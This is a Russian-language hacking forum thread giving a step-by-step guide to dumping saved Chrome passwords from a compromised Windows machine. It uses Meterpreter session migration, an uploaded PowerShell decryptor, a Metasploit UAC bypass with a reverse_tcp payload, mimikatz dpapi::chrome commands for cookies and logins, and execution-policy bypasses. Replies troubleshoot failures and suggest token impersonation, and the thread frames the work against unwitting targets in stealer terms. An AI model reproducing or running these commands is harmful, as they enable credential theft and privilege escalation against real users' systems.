Dump Chrome Passwords

OneDollar

Well-Known Member
Red Team
07.09.2017
197
215
32
#1
Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник:
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

upload_2017-11-29_3-25-56.png


2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid
Создание каталога:

Код:
mkdir Pass
cd Pass
Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll



upload_2017-11-29_3-50-11.png

3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
upload_2017-11-29_3-44-42.png

Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.





Я бы даже выделил следующие преимущества:
  1. Просто в исполнении.
  2. Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
  3. Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !
 

Вложения

Последнее редактирование:

woolf1514

Well-Known Member
06.03.2017
126
102
#2
Не сработало =( Windows server 2012 R2 Build 9600

upload_2017-11-29_12-4-54.png

И так далее. Может еще в какой процесс мигрировать?
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#3
Не сработало =( Windows server 2012 R2 Build 9600

Посмотреть вложение 13407

И так далее. Может еще в какой процесс мигрировать?
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
 
Последнее редактирование:

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#5
Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
17.jpg
 

Ondrik8

prodigy
Red Team
08.11.2016
746
1 939
#6
от себя дополню)


Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
грабит пассы от всего включая браузеры

Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
грабит пасы chrome от огрызков OSX

ну а вообще <mimikatz> умеет тоже делать такие вещи

Код:
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
Автору, жму руку: "молодец что не сдаешься, выход есть всегда!)"
 

adm2

Well-Known Member
Премиум
05.07.2017
50
93
#7
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
 

woolf1514

Well-Known Member
06.03.2017
126
102
#8
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
Посмотреть вложение 13408
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#9
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
То доступ к домашней папке по идеи не должно запросить повышенный. В случае вульфа у него доступ ограничен к домашней папке админа и требует повышенных привилегий.
В случае необходимости угнать данные рядового юзера имея админскую сессию или от имени системы - то нужно смотреть в сторону token_impersonate и угонять сессионный токен рядового юзера я думаю.
 
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
Ну у тебя по скрину видно что ексепшн из-за того что скрипт не может зайти в папку локального админа,так как дб файл паролей хрома хранится локально в домашней папки юзера.
 

IioS

Well-Known Member
Red Team
09.06.2017
193
316
62
#10
Статья из ряда, обязательно нужно знать.
Завтра протестирую допустим на win 10 и поделюсь результатами!
Жду тестов Вин10. Не могу понять почему без миграций куда-то, ничего не получиться.
 

Ondrik8

prodigy
Red Team
08.11.2016
746
1 939
#11
миграция в процесс по любому нужна, так как она дает возможность действовать от любого процесса в системе и дает минимальный риск, то есть меньше палива)) говоря простым языком и это не единственное преимущество которое она дает)
 

OneDollar

Well-Known Member
Red Team
07.09.2017
197
215
32
#12
Я только включаюсь в работу. Значит пока то что есть, могу показать какие у меня привилегии в системе где получилось взять пассы. В течении дня выложу результаты по 10. Спасибо всем!

upload_2017-11-29_15-13-32.png

upload_2017-11-29_15-13-44.png
 
Симпатии: Понравилось id2746

swap3r

Active Member
Премиум
06.11.2016
33
21
117
#13
Возможно, вопрос немного не сюда, но тематика близкая. А есть ли что-то похожее для Chrome под Android?
Можно даже упростить задачу: наличие физического доступа к телефону, телефон не рутован (рутовать нельзя), нужно вытащить "забытый" пароль от форума, который сохраненный в браузере.
Спасибо.
 
Симпатии: Понравилось TST

OneDollar

Well-Known Member
Red Team
07.09.2017
197
215
32
#14
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
У меня данный способ не отрабатывает, на винде 10 открывается просмотр событий, сессия не создается.
Я воспользовался

exploit/windows/local/bypassuac_fodhelper

И сессия была создана. Привилегии есть такие же как и на windows server 2012 R2, но пишет ошибку. Ищу решение проблемы

upload_2017-11-29_16-29-25.png

upload_2017-11-29_16-56-6.png
 

Вложения

Последнее редактирование:

TST

Member
28.11.2017
17
2
28
#15
Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник:
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

Посмотреть вложение 13384


2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid
Создание каталога:

Код:
mkdir Pass
cd Pass
Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll



Посмотреть вложение 13388

3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
Посмотреть вложение 13387

Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.





Я бы даже выделил следующие преимущества:

  1. Просто в исполнении.
    Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
    Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !
При загрузке выдает ошибку что
core_channel_open: Operation failed: The system cannot find the path specified.
Screenshot from 2017-11-30 10-33-11.png
 

OneDollar

Well-Known Member
Red Team
07.09.2017
197
215
32
#16

OneDollar

Well-Known Member
Red Team
07.09.2017
197
215
32
#19
У меня данный способ не отрабатывает, на винде 10 открывается просмотр событий, сессия не создается.
Я воспользовался

exploit/windows/local/bypassuac_fodhelper

И сессия была создана. Привилегии есть такие же как и на windows server 2012 R2, но пишет ошибку. Ищу решение проблемы

Посмотреть вложение 13423

Посмотреть вложение 13425
Решил допилить темку. Значится так, если мы видим сообщения как здесь на скрине, то все что нам нужно сделать это :

Код:
powershell Set-ExecutionPolicy BYPASS
Подробнее что мы делаем данной командой в шеле
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
и
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


Важно, привилегии при этом должны быть именно администратора. Как писал в коментах ~~DarkNode~~ " как будто вы на целевой машине запускается что-либо от имени админа" так и тут ! Метод получения прав админа я описал в своей следующей статье связанной с дампом информации из буфера обмена, там то и описаны способы повышения привилегий до админ. Чекайте тут

Важно: вы должны находится в процессе с х64 иначе скрипт так же не отработает, в подробностях не могу сказать почему, позабыл где читал, но у меня так же не отрабатывал будь я в любом процессе х86!

Есть процесс повершел х86 и х64. Нам нужно разрешить запуск скрипта для двух этих шеллов. Для этого

Код:
x64 shell C:\Windows\syswow64\Windowspowershell\v1.0\powershell Set-ExecutionPolicy BYPASS[/B][/B][/B]
[B][B][B]x32 shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell Set-ExecutionPolicy BYPASS

upload_2017-12-3_20-47-2.png

upload_2017-12-3_20-41-34.png

Если мы в метерпретере, то так же нужно проверить разрядность командной строки или повершел

Код:
В CMD: echo %PROCESSOR_ARCHITECTURE%
В Powershell: powershell [Environment]::Is64BitProcess
Мы должны видеть это :

upload_2017-12-3_20-25-47.png
upload_2017-12-3_20-26-27.png
Если соблюдены все правила :

1. мы от админа
2. мы разрешили запуск скриптов ps1 без их проверки как для х64 так и для х86 powershell
3. мы находимся в х64 процессе
4. мы полили клавиатуру святой водой

То на выходе получим это :



PROF1T!
В заключении хочу сказать, что все легко и просто бывает только в сказках. В любом случае каждая система требует индивидуальных извращений. С одной из таких и я столкнулся. Так же виндовс 10, так же процесс х64. Так же права админа, также разрешен запуск скриптов без разрешения, но подвел именно декрипт! Мне выбило пассы в левом столбце, а логины и адреса сайтов в дикую перемешку справа! Я так и не смог с помощью данного способа получить адекватно пассы. Но сдаваться когда есть цель нельзя! Я не просто так говорю, потому что я пошел далее, дождался пока агент будет АФК, убил процессы хрома (это одно из главных правил при получении паролей в империи) и будучи при админ правах запустил дамп пассов с хрома и получил их!! Действуйте, не сдавайтесь, ищите новые лазейки, проявляйте творчество в этом не легком деле и даже после 100 поражений и будет вам результат!